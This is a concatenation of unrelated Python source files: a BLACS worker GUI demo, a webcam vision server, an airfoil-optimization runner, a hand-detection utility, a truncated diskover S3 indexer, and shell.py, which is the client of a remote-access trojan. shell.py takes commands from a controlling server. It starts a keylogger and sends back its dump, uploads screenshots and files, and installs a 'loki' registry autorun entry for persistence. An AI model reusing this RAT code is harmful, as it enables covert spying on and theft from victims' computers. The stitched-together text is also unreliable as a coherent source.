self.create_worker('My worker',MyWorker,{'x':7}) self.initUI() def initUI(self): self.layout = self.get_tab_layout() foobutton = QPushButton('foo, 10 seconds!') barbutton = QPushButton('bar, 10 seconds, then error!') bazbutton = QPushButton('baz, 0.5 seconds!') addbazbutton = QPushButton('add 2 second timeout to baz') removebazbutton = QPushButton('remove baz timeout') bazunpickleable= QPushButton('try to pass baz a threading.Lock()') fatalbutton = QPushButton('fatal error, forgot to add @define_state to callback!') self.checkbutton = QPushButton('have baz\nreturn a Queue') self.checkbutton.setCheckable(True) #self.device_widget.addWidget(layout) self.layout.addWidget(foobutton) self.layout.addWidget(barbutton) self.layout.addWidget(bazbutton) self.layout.addWidget(addbazbutton) self.layout.addWidget(removebazbutton) self.layout.addWidget(bazunpickleable) self.layout.addWidget(fatalbutton) self.layout.addWidget(self.checkbutton) foobutton.clicked.connect(self.foo) barbutton.clicked.connect(self.bar) bazbutton.clicked.connect(self.baz) fatalbutton.clicked.connect(self.fatal ) addbazbutton.clicked.connect(self.add_baz_timeout) removebazbutton.clicked.connect(self.remove_baz_timeout) bazunpickleable.clicked.connect(self.baz_unpickleable) # It is critical that you decorate your callbacks with @define_state # as below. This makes the function get queued up and executed # in turn by our state machine instead of immediately by the # GTK mainloop. Only don't decorate if you're certain that your # callback can safely happen no matter what state the system is # in (for example, adjusting the axis range of a plot, or other # appearance settings). You should never be calling queue_work # or do_after from un undecorated callback. @define_state(MODE_MANUAL,True) def foo(self): self.logger.debug('entered foo') #self.toplevel.set_sensitive(False) # Here's how you instruct the worker process to do # something. When this callback returns, the worker will be # requested to do whatever you ask in queue_work (in this # case, MyWorker.foo(5,6,7,x='x') ). Then, no events will # be processed until that work is done. Once the work is # done, whatever has been set with do_after will be executed # (in this case self.leave_foo(1,2,3,bar=baz) ). results = yield(self.queue_work('My worker','foo', 5,6,7,x='x')) #self.toplevel.set_sensitive(True) self.logger.debug('leaving foo') # Here's what's NOT to do: forgetting to decorate a callback with @define_state # when it's not something that can safely be done asynchronously # to the state machine: def fatal(self): # This bug could be hard to track because nothing will happen # when you click the button -- only once you do some other, # correcly decorated callback will it become apparant that # something is wrong. So don't make this mistake! 
self.queue_work('My worker','foo', 5,6,7,x='x') @define_state(MODE_MANUAL,True) def bar(self): self.logger.debug('entered bar') results = yield(self.queue_work('My worker','bar', 5,6,7,x=5)) self.logger.debug('leaving bar') @define_state(MODE_MANUAL,True) def baz(self, button=None): print(threading.current_thread().name) self.logger.debug('entered baz') results = yield(self.queue_work('My worker','baz', 5,6,7,x='x',return_queue=self.checkbutton.isChecked())) print(results) print(threading.current_thread().name) results = yield(self.queue_work('My worker','baz', 4,6,7,x='x',return_queue=self.checkbutton.isChecked())) print(results) print(threading.current_thread().name) self.logger.debug('leaving baz') # This event shows what happens if you try to send a unpickleable # event through a queue to the subprocess: @define_state(MODE_MANUAL,True) def baz_unpickleable(self): self.logger.debug('entered baz_unpickleable') results = yield(self.queue_work('My worker','baz', 5,6,7,x=threading.Lock())) self.logger.debug('leaving baz_unpickleable') # You don't need to decorate with @define_state if all you're # doing is adding a timeout -- adding a timeout can safely be done # asynchronously. But you can still decorate if you want, and you # should if you're doing other work in the same function call which # can't be done asynchronously. def add_baz_timeout(self): self.statemachine_timeout_add(2000,self.baz) # Similarly, no @define_state is required here -- same applies as above. def remove_baz_timeout(self): self.statemachine_timeout_remove(self.baz) class MyWorker(Worker): def init(self): # You read correctly, this isn't __init__, it's init. It's the # first thing that will be called in the new process. You should # do imports here, define instance variables, that sort of thing. You # shouldn't import the hardware modules at the top of your file, # because then they will be imported in both the parent and # the child processes and wont be cleanly restarted when the subprocess # is restarted. Since we're inside a method call though, you'll # have to use global statements for the module imports, as shown # below. Either that or you can make them instance variables, ie: # import module; self.module = module. Up to you, I prefer # the former. global serial; import serial self.logger.info('got x! %d' % self.x) raise Exception('bad import!') # Here's a function that will be called when requested by the parent # process. There's nothing special about it really. Its return # value will be passed as a keyword argument _results to the # function which was queued with do_after, if there was one. def foo(self,*args,**kwargs): self.logger.debug('working on foo!') time.sleep(10) return 'results!!!' def bar(self,*args,**kwargs): self.logger.debug('working on bar!') time.sleep(10) raise Exception('error!') return 'results!!!' 
def baz(self,zzz,*args,**kwargs): self.logger.debug('working on baz: time is %s'%repr(time.time())) time.sleep(0.5) if kwargs['return_queue']: return queue.Queue() return 'results%d!!!'%zzz if __name__ == '__main__': import sys import logging.handlers # Setup logging: logger = logging.getLogger('BLACS') handler = logging.handlers.RotatingFileHandler(os.path.join(BLACS_DIR, 'BLACS.log'), maxBytes=1024**2, backupCount=0) formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s') handler.setFormatter(formatter) handler.setLevel(logging.DEBUG) logger.addHandler(handler) if sys.stdout is not None and sys.stdout.isatty(): terminalhandler = logging.StreamHandler(sys.stdout) terminalhandler.setFormatter(formatter) terminalhandler.setLevel(logging.INFO) logger.addHandler(terminalhandler) else: sys.stdout = sys.stderr = open(os.devnull) logger.setLevel(logging.DEBUG) logger.info('\n\n===============starting===============\n') if __name__ == '__main__': from labscript_utils.qtwidgets.dragdroptab import DragDropTabWidget app = QApplication(sys.argv) window = QWidget() layout = QVBoxLayout(window) notebook = DragDropTabWidget() layout.addWidget(notebook) class FakeConnection(object): def __init__(self): self.BLACS_connection = 'None' class FakeConnectionTable(object): def __init__(self): pass def find_by_name(self, device_name): return FakeConnection() connection_table = FakeConnectionTable() tab1 = MyTab(notebook,settings = {'device_name': 'Example', 'connection_table':connection_table}) tab2 = MyTab(notebook,settings = {'device_name': 'Example2', 'connection_table':connection_table}) window.show() def run(): app.exec_() tab1.close_tab() tab2.close_tab() sys.exit(run())
server.py
from __future__ import print_function, division

__import__('sys').dont_write_bytecode = True  # prevent stupid pyc files

import socket as s
import time
import threading
from boltons.socketutils import BufferedSocket
import cv2
import json
from imageprocessor import process
from camera import Camera
from manualcontrol import ManualController

# Diagonal fov of webcam in degrees. X fov will be calculated with aspect ratio.
DIAG_FOV = 83
VISUALIZE_FEED = True

port = 4444
udp_port = 4445

serversocket = s.socket()
serversocket.bind(('0.0.0.0', port))
serversocket.listen(1)


def udp_listener_thread():
    udp_sock = s.socket(s.AF_INET, s.SOCK_DGRAM)
    udp_sock.bind(('0.0.0.0', udp_port))
    print('Waiting for udp ping!')
    msg, addr = udp_sock.recvfrom(256)
    print('Received udp ping from {}!'.format(addr))
    udp_sock.sendto(msg, addr)


def millis():
    return round(time.time() * 1000)


udp_thread = threading.Thread(target=udp_listener_thread, args=())
udp_thread.daemon = True
udp_thread.start()

print('Waiting for TCP connection...')
socket, addr = serversocket.accept()
print('Received TCP connection from {}!'.format(addr))
serversocket.close()
socket = BufferedSocket(socket)


class SimpleNamespace():
    pass


last_frame = SimpleNamespace()
lock = threading.Lock()


def overwrite(message):
    global last_message
    try:
        print('\r' + ''.join([' '] * len(last_message)), end='')
    except:
        pass
    print('\r' + message, end='')
    last_message = message


def communicate_thread():
    try:
        while True:
            request = socket.recv_until(b'\n', timeout=None).decode('utf-8')
            request = json.loads(request)
            if request['id'] == 1:
                lock.acquire()
                response_json = json.dumps(last_frame.__dict__)
                response = response_json + '\n'
                lock.release()
                if response != '{}\n':
                    overwrite(response_json)
                socket.send(response.encode())
                socket.flush()
            elif request['id'] == -1:
                break
    except:
        pass
    print('')
    global running
    running = False


vision = Camera(process, DIAG_FOV)
print('Camera resolution: %s' % str(vision.resolution()))
controller = ManualController()

img_thread = threading.Thread(target=communicate_thread)
img_thread.daemon = True
img_thread.start()

running = True
while True:
    if not running:
        break
    if controller.manual_control():
        lock.acquire()
        last_frame = controller.get_frame()
        lock.release()
    else:
        global img
        frame, img = vision.get_vision_frame(visualize=VISUALIZE_FEED)
        if frame is not None and img is not None:
            lock.acquire()
            last_frame = frame
            lock.release()
            if VISUALIZE_FEED:
                cv2.imshow('Image', img)
                cv2.waitKey(1)

vision.release()
controller.release()
cv2.destroyAllWindows()
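
# --------------------------------------------------------------------------- #
# Illustrative client (not part of the original file). A minimal sketch of    #
# the wire protocol implied by communicate_thread(): newline-delimited JSON   #
# requests, where {"id": 1} asks for the latest frame data and {"id": -1}     #
# closes the connection. The UDP ping on port 4445 is simply echoed back and  #
# can be used for discovery. The host 'localhost' is an assumption.           #
# --------------------------------------------------------------------------- #
def example_client(host='localhost', tcp_port=4444, udp_port=4445):
    import json
    import socket as stdlib_socket

    # Optional discovery ping: the server echoes whatever datagram it receives.
    udp = stdlib_socket.socket(stdlib_socket.AF_INET, stdlib_socket.SOCK_DGRAM)
    udp.settimeout(2.0)
    try:
        udp.sendto(b'ping', (host, udp_port))
        udp.recvfrom(256)
    except stdlib_socket.timeout:
        pass
    finally:
        udp.close()

    # Request one frame over TCP, then ask the server to close the link.
    tcp = stdlib_socket.create_connection((host, tcp_port))
    try:
        tcp.sendall(json.dumps({'id': 1}).encode() + b'\n')
        reply = b''
        while not reply.endswith(b'\n'):
            chunk = tcp.recv(4096)
            if not chunk:
                break
            reply += chunk
        frame = json.loads(reply.decode('utf-8')) if reply.strip() else {}
        tcp.sendall(json.dumps({'id': -1}).encode() + b'\n')
    finally:
        tcp.close()
    return frame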
runner.py
import configparser import datetime import glob import h5py import json import os import requests import smtplib import subprocess import sys import time import threading from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.image import MIMEImage config = configparser.ConfigParser() config.read(os.environ["SMTP_SETTINGS"]) config = config["DEFAULT"] def reporter(host, id): while True: hdf5_files = glob.glob("*.hdf5") if len(hdf5_files): try: if len(hdf5_files) > 1: for file in hdf5_files[:-1]: os.remove(file) with h5py.File(hdf5_files[-1], "r") as f: requests.post( f"{host}/runs/update", json={ "id": id, "progress": { "iteration": int(hdf5_files[-1].split(".")[0]), "pop": f["pop"][:].tolist(), "fit": f["fit"][:].tolist(), }, }, ) os.remove(hdf5_files[-1]) continue except: pass time.sleep(0.1) def run( cl, re, ma, n_c, n_t, gen=100, tolx=1e-8, tolf=1e-8, fix_te=True, t_te_min=0.0, t_c_min=0.01, r_le_min=0.05, A_cs_min=None, Cm_max=None, strategy="rand-to-best/1/exp/random", f=None, cr=None, adaptivity=2, n_proc=28, run_name=None, report=False, **kwargs, ): """ Solve the specified optimization problem and handle reporting of results. Parameters ---------- cl : float Design lift coefficient re : float Reynolds number ma : float Mach number n_c, n_t : int Number of CST coefficients for the chord line and thickness distribution, respectively gen : int, optional Number of generations to use for the genetic algorithm. 100 by default tolx : float, optional Tolerance on the spread of the design vectors. tolf: float, optional Tolerance on the spread of objective functions. fix_te : bool, optional True if the trailing edge thickness should be fixed. True by default t_te_min : float, optional Minimum TE thickness as fraction of chord length. Default is 0.0. t_c_min : float or None, optional Minimum thickness over chord ratio. None if unconstrained. Defaults is 0.01. r_le_min : float or None, optional Minimum leading edge radius. None if unconstrained. Defaults is 0.05. A_cs_min : float or None, optional Minimum cross sectional area. None if unconstrained. Default is None. Cm_max : float or None, optional Maximum absolute moment coefficient. None if unconstrained. Default is None. strategy : string, optional Evolution strategy to use. Default is 'rand-to-best/1/exp/random'. f : float or None, optional Mutation rate cr : float or None, optional Crossover rate adaptivity : 0, 1, or 2 Which kind of self-adaptivity to ue (0: none, 1: simple, 2: complex) n_proc : int, optional Number of processors to use to evaluate functions in parallel using MPI. 28 by default run_name : str, optional Name of the run. If None, an ISO formatted UTC timestamp will be used. report : bool, optional True if the results should be reported via email. 
""" returncode = -1 try: if run_name is None: now = datetime.datetime.utcnow() run_name = ( now.isoformat(timespec="seconds").replace("-", "").replace(":", "") + "Z" ) path = os.path.join(os.path.abspath(os.environ["RESULTS_DIR"]), run_name) os.makedirs(path) repr_file = os.path.join(path, "repr.yml") dat_file = os.path.join(path, "optimized.dat") png_file = os.path.join(path, "optimized.png") log_file = os.path.join(path, "log.txt") cmd = [ "mpirun", "-np", str(n_proc), "python3", "-u", "-m", "af_opt.problem", str(cl), str(re), str(ma), str(n_c), str(n_t), str(gen), str(tolx), str(tolf), str(fix_te), str(t_te_min), str(t_c_min), str(r_le_min), str(A_cs_min), str(Cm_max), strategy, str(f), str(cr), str(adaptivity), str(repr_file), str(dat_file), str(png_file), ] print(f"Going to run the following command: \n{cmd}") process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) for line in process.stdout: s = line.decode("utf-8") sys.stdout.write(s) with open(log_file, "a+") as log: log.write(s) with open(log_file, "r") as f: all_text = f.read() with open(log_file, "w") as f: f.write(all_text.replace("\n\n", "\n")) process.communicate() returncode = process.returncode if report: print("Going to send an email") msg = MIMEMultipart() msg["From"] = config["user"] msg["To"] = config["receiver"] msg["Subject"] = "Airfoil Optimization Complete!" with open(repr_file, "r") as f: msg.attach(MIMEText(f.read(), "plain")) f.seek(0) attachment = MIMEText(f.read(), _subtype="yaml") attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(repr_file), ) msg.attach(attachment) with open(png_file, "rb") as fp: attachment = MIMEImage(fp.read(), _subtype="png") attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(png_file), ) msg.attach(attachment) with open(dat_file, "r") as f: attachment = MIMEText(f.read()) attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(dat_file), ) msg.attach(attachment) with open(log_file, "r", encoding="utf-8") as f: attachment = MIMEText(f.read()) attachment.add_header( "Content-Disposition", "attachment", filename=os.path.basename(log_file), ) msg.attach(attachment) with smtplib.SMTP_SSL(config["host"], int(config["port"])) as server: server.ehlo() server.login(config["user"], config["password"]) server.sendmail(config["user"], config["receiver"], msg.as_string()) print("Email sent") except Exception as e: print(e) return returncode def main(): """ Poll runs service for new run cases and run them. """ host = os.environ["RUNS_SERVICE_URL"] while True: try: r = requests.get(f"{host}/runs/accept") if r.status_code == 204: time.sleep(1) continue response_object = r.json() id = response_object["data"]["id"] kwargs = dict(response_object["data"]) print(f"Got a request to start a run with the following data: \n{kwargs}") thread = threading.Thread(target=reporter, args=(host, id)) thread.start() returncode = run(**kwargs, host=host) print(f"Returncode: {returncode}") requests.post( f"{host}/runs/complete", json={"id": id, "success": returncode == 0} ) except requests.exceptions.ConnectionError as e: pass except json.decoder.JSONDecodeError: print(f"Invalid response from server: {r}") except TypeError: print("Invalid run case") requests.post(f"{host}/runs/complete", json={"id": id, "success": False}) if __name__ == "__main__": main()
detector_utils.py
# Utilities for object detector. import numpy as np import sys import tensorflow as tf import os from threading import Thread from datetime import datetime import cv2 from utils import label_map_util from collections import defaultdict detection_graph = tf.Graph() sys.path.append("..") # score threshold for showing bounding boxes. _score_thresh = 0.05 MODEL_NAME = 'hand_inference_graph' # Path to frozen detection graph. This is the actual model that is used for the object detection. PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb' # List of the strings that is used to add correct label for each box. PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt') NUM_CLASSES = 1 # load label map label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories( label_map, max_num_classes=NUM_CLASSES, use_display_name=True) category_index = label_map_util.create_category_index(categories) # Load a frozen infrerence graph into memory def load_inference_graph(): # load frozen tensorflow model into memory print("> ====== loading HAND frozen graph into memory") detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') sess = tf.Session(graph=detection_graph) print("> ====== Hand Inference graph loaded.") return detection_graph, sess # draw the detected bounding boxes on the images # You can modify this to also draw a label. def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np): coordinates = [] for i in range(num_hands_detect): if (scores[i] > score_thresh): (left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width, boxes[i][0] * im_height, boxes[i][2] * im_height) # if the bounding box is too large, ignore them box_width = int(right) - int(left) box_height = int(bottom) - int(top) if box_width >= im_width/2 or box_height >= im_height/2: continue center = (int((int(right) + int(left))/2), int((int(bottom) + int(top))/2)) p1 = (int(left), int(top)) p2 = (int(right), int(bottom)) # if the hand is not within the region of interest, ignore them if center[0] > int(0.8 * im_width) or center[0] < int(0.2 * im_width) or center[1] < int(0.5 * im_height): continue # draw bounding box cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1) # plot the center of the bounding box cv2.circle(image_np, center, 5, (255, 0, 0), -1) coordinates.append(center) return coordinates # Show fps value on image. def draw_fps_on_image(fps, image_np): cv2.putText(image_np, fps, (20, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2) # Actual detection .. generate scores and bounding boxes given an image def detect_objects(image_np, detection_graph, sess): # Definite input and output Tensors for detection_graph image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. detection_boxes = detection_graph.get_tensor_by_name( 'detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. 
detection_scores = detection_graph.get_tensor_by_name( 'detection_scores:0') detection_classes = detection_graph.get_tensor_by_name( 'detection_classes:0') num_detections = detection_graph.get_tensor_by_name( 'num_detections:0') image_np_expanded = np.expand_dims(image_np, axis=0) (boxes, scores, classes, num) = sess.run( [detection_boxes, detection_scores, detection_classes, num_detections], feed_dict={image_tensor: image_np_expanded}) return np.squeeze(boxes), np.squeeze(scores) # Code to thread reading camera input. # Source : Adrian Rosebrock # https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/ class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.stream = cv2.VideoCapture(src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) (self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def size(self): # return size of the capture device return self.stream.get(3), self.stream.get(4) def stop(self): # indicate that the thread should be stopped self.stopped = True
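# --- Editor's usage sketch (not part of the original module): the helpers above are
# typically wired together as below -- grab frames on a background thread with
# WebcamVideoStream, run the frozen graph with detect_objects(), then filter/draw the
# boxes with draw_box_on_image(). This assumes the module is saved as detector_utils.py,
# the hand_inference_graph files are present, and a webcam is available at index 0;
# the 0.2 score threshold is an illustrative choice, not a value from the module.
import cv2

import detector_utils  # the module defined above

if __name__ == "__main__":
    detection_graph, sess = detector_utils.load_inference_graph()
    stream = detector_utils.WebcamVideoStream(src=0, width=640, height=480).start()
    im_width, im_height = stream.size()
    try:
        while True:
            frame = stream.read()
            frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            boxes, scores = detector_utils.detect_objects(frame_rgb, detection_graph, sess)
            # try to draw up to 2 hands that pass the score and region-of-interest filters
            detector_utils.draw_box_on_image(2, 0.2, scores, boxes,
                                             im_width, im_height, frame)
            cv2.imshow("hands", frame)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                break
    finally:
        stream.stop()
        cv2.destroyAllWindows()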
shell.py
# Date: 06/04/2018 # Author: Pure-L0G1C # Description: Communicate with server import sys import subprocess from os import chdir from time import sleep from queue import Queue from threading import Thread, RLock from . import ssh, sftp, screen, sscreenshare, keylogger class Shell(object): def __init__(self, sess_obj, services, home): self.recv_queue = Queue() self.disconnected = False self.services = services self.session = sess_obj self.home = home self.is_alive = True self.lock = RLock() self.ftp = None self.ssh = None self.keylogger = None self.screenshare = None self.cmds = { 1: self.ssh_obj, 2: self.reconnect, 3: self.download, 4: self.upload, 5: self.screen, 6: self.chrome, 7: self.disconnect, 8: self.create_persist, 9: self.remove_persist, 12: self.logger_start, 13: self.logger_stop, 14: self.logger_dump, 15: self.screenshare_start, 16: self.screenshare_stop } def listen_recv(self): while self.is_alive: recv = self.session.recv() if recv == -1: continue # timed out if recv: with self.lock: self.recv_queue.put(recv) else: if self.is_alive: self.is_alive = False self.display_text('Server went offline') def parser(self): while self.is_alive: if self.recv_queue.qsize(): data = self.recv_queue.get() code = data['code'] args = data['args'] self.display_text(data['args']) if code in self.cmds: Thread(target=self.cmds[code], args=[ args], daemon=True).start() def stop(self): if self.ssh: self.ssh.close() if self.ftp: self.ftp.close() if self.keylogger: self.keylogger.stop() if self.screenshare: self.screenshare.stop() def shell(self): t1 = Thread(target=self.listen_recv) t2 = Thread(target=self.parser) t1.daemon = True t2.daemon = True t1.start() t2.start() while self.is_alive: try: sleep(0.5) except: break self.close() def send(self, code=None, args=None): self.session.send(code=code, args=args) # -------- UI -------- # def display_text(self, text): print('{0}Response: {1}{0}'.format('\n\n\t', text)) def close(self): self.is_alive = False self.session.shutdown() self.stop() def reconnect(self, args): print('Reconnecting ...') self.close() def disconnect(self, args): print('Disconnecting ...') self.disconnected = True self.close() def ssh_obj(self, args): if self.ssh: self.ssh.close() self.ssh = ssh.SSH( self.services['ssh']['ip'], self.services['ssh']['port'], self.home) t = Thread(target=self.ssh.client) t.daemon = True t.start() def screenshare_start(self, update): if self.screenshare: self.screenshare.stop() self.screenshare = sscreenshare.ScreenShare( self.services['ftp']['ip'], self.services['ftp']['port'], update ) if self.screenshare.setup() != 0: self.screenshare = None else: Thread(target=self.screenshare.start, daemon=True).start() def screenshare_stop(self, args): if self.screenshare: self.screenshare.stop() def download(self, args): print('Downloading ...') self.ftp = sftp.sFTP( self.services['ftp']['ip'], self.services['ftp']['port'], self.home, verbose=True) try: self.ftp.recv() except: pass finally: self.ftp.close() def upload(self, file): print('Uploading {}'.format(file)) self.ftp = sftp.sFTP( self.services['ftp']['ip'], self.services['ftp']['port'], self.home, verbose=True) try: self.ftp.send(file) except: pass finally: self.ftp.close() def screen(self, args): chdir(self.home) screen.screenshot() self.upload(screen.file) screen.clean_up() def chrome(self, urls): if '-1' in urls: return cmd = 'start chrome -incognito {}'.format(' '.join(urls)) subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def create_persist(self, 
args): if hasattr(sys, 'frozen'): _path = sys.executable cmd = r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v loki /f /d "\"{}\""'.format( _path) subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def remove_persist(self, args): if hasattr(sys, 'frozen'): cmd = r'reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v loki /f' subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def logger_start(self, args): if not self.keylogger: self.keylogger = keylogger.Keylogger() self.keylogger.start() def logger_stop(self, args): if self.keylogger: self.keylogger.stop() def logger_dump(self, args): if self.keylogger: self.send(-0, self.keylogger.dump())
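# --- Editor's sketch (not part of the original module): Shell.parser() above routes each
# incoming message by looking its integer code up in the self.cmds dictionary and running
# the matching bound method on its own daemon thread. The same dispatch pattern in
# isolation, with harmless placeholder handlers:
from threading import Thread
from time import sleep


class Dispatcher(object):
    def __init__(self):
        self.cmds = {1: self.ping, 2: self.echo}

    def ping(self, args):
        print('pong')

    def echo(self, args):
        print('echo: {}'.format(args))

    def handle(self, data):
        code, args = data['code'], data['args']
        if code in self.cmds:
            Thread(target=self.cmds[code], args=[args], daemon=True).start()


if __name__ == '__main__':
    d = Dispatcher()
    d.handle({'code': 1, 'args': None})
    d.handle({'code': 2, 'args': 'hello'})
    sleep(0.1)  # give the daemon handler threads a moment to run before exiting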
diskover_s3.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """diskover - Elasticsearch file system crawler diskover is a file system crawler that index's your file metadata into Elasticsearch. See README.md or https://github.com/shirosaidev/diskover for more information. Amazon S3 inventory module for diskover Copyright (C) Chris Park 2017-2018 diskover is released under the Apache 2.0 license. See LICENSE for the full license text. """ import os import gzip import csv from datetime import datetime import time import hashlib try: from Queue import Queue as pyQueue except ImportError: from queue import Queue as pyQueue from threading import Thread, RLock from diskover import config, plugins, progress_bar from diskover_bot_module import get_worker_name, auto_tag, es_bulk_add, file_excluded fake_dirs = [] buckets = [] workername = get_worker_name() # create queue and threads for bulk adding to ES s3queue = pyQueue() s3threadlock = RLock() def process_line(row, tree_dirs, tree_files, cliargs): global fake_dirs n = 2 # S3 Inventory csv column headers inventory_dict = {'s3_bucket': row[0], 's3_key': row[1]} try: inventory_dict['s3_size'] = int(row[n]) n = n + 1 except IndexError: pass try: inventory_dict['s3_last_modified_date'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_etag'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_storage_class'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_multipart_upload'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_replication_status'] = row[n] n = n + 1 except IndexError: pass try: inventory_dict['s3_encryption_status'] = row[n] except IndexError: pass # prepare inventory dict for diskover index # fake path /s3/bucketname/key bucket = '/s3/' + row[0] + '/' path = os.path.join(bucket, inventory_dict['s3_key']) # check if directory if path.endswith('/'): isdir = True path = path.rstrip('/') s3threadlock.acquire() fake_dirs.append(path) s3threadlock.release() else: isdir = False # add any directories in path to fake dirs splitpath = inventory_dict['s3_key'].split('/') # remove file name splitpath = splitpath[:-1] prev_path = bucket.rstrip('/') for p in splitpath: # create fake directory entry s3threadlock.acquire() dir_dict = make_fake_s3_dir(prev_path, p, cliargs) s3threadlock.release() current_path = os.path.join(prev_path, p) if dir_dict is None: prev_path = current_path continue tree_dirs.append(dir_dict) # increment items counts of parentdir for d in tree_dirs: if d['filename'] == os.path.basename(dir_dict['path_parent']): d['items_subdirs'] += 1 d['items'] += 1 break prev_path = current_path size = inventory_dict['s3_size'] # filename filename = os.path.basename(path) # check if file is in exluded_files list extension = os.path.splitext(filename)[1][1:].strip().lower() if file_excluded(filename, extension, path, cliargs['verbose']): return tree_dirs, tree_files # Skip files smaller than minsize cli flag if not isdir and size < cliargs['minsize']: return tree_dirs, tree_files # modified time mtime_utc = inventory_dict['s3_last_modified_date'].partition('.')[0] # modified time in unix mtime_unix = time.mktime(time.strptime(mtime_utc, '%Y-%m-%dT%H:%M:%S')) # get time indextime_utc = datetime.utcnow().isoformat() # get absolute path of parent directory parentdir = os.path.abspath(os.path.join(path, os.pardir)) # absolute full path fullpath = os.path.abspath(os.path.join(parentdir, filename)) # remove any keys (fields) we don't want to add to ES inventory_dict.pop('s3_size', None) 
inventory_dict.pop('s3_last_modified_date', None) if isdir: # directory inventory_dict['filename'] = filename inventory_dict['path_parent'] = parentdir inventory_dict["filesize"] = 0 inventory_dict["items"] = 1 # 1 for itself inventory_dict["items_files"] = 0 inventory_dict["items_subdirs"] = 0 inventory_dict["last_modified"] = mtime_utc inventory_dict["tag"] = "" inventory_dict["tag_custom"] = "" inventory_dict["indexing_date"] = indextime_utc inventory_dict["worker_name"] = workername inventory_dict["change_percent_filesize"] = "" inventory_dict["change_percent_items"] = "" inventory_dict["change_percent_items_files"] = "" inventory_dict["change_percent_items_subdirs"] = "" inventory_dict["_type"] = "directory" # increment items counts of parentdir for d in tree_dirs: if d['filename'] == os.path.basename(parentdir): d['items_subdirs'] += 1 d['items'] += 1 break # add any autotags to inventory_dict if cliargs['autotag'] and len(config['autotag_dirs']) > 0: auto_tag(inventory_dict, 'directory', mtime_unix, None, None) # check plugins for adding extra meta data to dirmeta_dict for plugin in plugins: try: # check if plugin is for directory doc mappings = {'mappings': {'directory': {'properties': {}}}} plugin.add_mappings(mappings) inventory_dict.update(plugin.add_meta(fullpath)) except KeyError: pass tree_dirs.append(inventory_dict) else: # file # Convert time in days (mtime cli arg) to seconds time_sec = cliargs['mtime'] * 86400 file_mtime_sec = time.time() - mtime_unix # Only process files modified at least x days ago if file_mtime_sec < time_sec: return tree_files, tree_dirs # create md5 hash of file using metadata filesize and mtime filestring = str(size) + str(mtime_unix) filehash = hashlib.md5(filestring.encode('utf-8')).hexdigest() inventory_dict['filename'] = filename inventory_dict['path_parent'] = parentdir inventory_dict["extension"] = extension inventory_dict["filesize"] = size inventory_dict["last_modified"] = mtime_utc inventory_dict["filehash"] = filehash inventory_dict["tag"] = "" inventory_dict["tag_custom"] = "" inventory_dict["dupe_md5"] = "" inventory_dict["indexing_date"] = indextime_utc inventory_dict["worker_name"] = workername inventory_dict["_type"] = "file" # add file size and increment items counts to parentdir for d in tree_dirs: if d['filename'] == os.path.basename(parentdir): d['filesize'] += size d['items_files'] += 1 d['items'] += 1 break # check plugins for adding extra meta data to inventory_dict for plugin in plugins: try: # check if plugin is for file doc mappings = {'mappings': {'file': {'properties': {}}}} plugin.add_mappings(mappings) inventory_dict.update(plugin.add_meta(fullpath)) except KeyError: pass # add any autotags to inventory_dict if cliargs['autotag'] and len(config['autotag_files']) > 0: auto_tag(inventory_dict, 'file', mtime_unix, None, None) tree_files.append(inventory_dict) return tree_dirs, tree_files def process_s3_inventory(inventory_file, cliargs): """Process s3 inventory function. Takes an S3 inventory file (gzipped csv), processes and bulk adds it into diskover index. 
